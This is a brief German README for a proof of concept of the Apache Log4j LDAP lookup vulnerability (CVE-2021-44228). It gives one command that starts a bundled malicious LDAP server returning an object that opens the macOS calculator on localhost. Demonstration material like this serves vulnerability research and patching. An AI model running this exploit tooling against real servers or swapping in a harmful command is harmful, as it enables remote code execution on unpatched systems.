
Proof of Concept der Sicherheitslücke beim LDAP-Lookup von apache log4j. CVE-2021-44228
Proof of Concept der Apache-Log4j-LDAP-Lookup-Schwachstelle
Weitere Informationen zur Schwachstelle findest du hier: https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
Wie führe ich den mitgelieferten LDAP-Server aus, der ein schädliches Objekt zurückgibt?
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"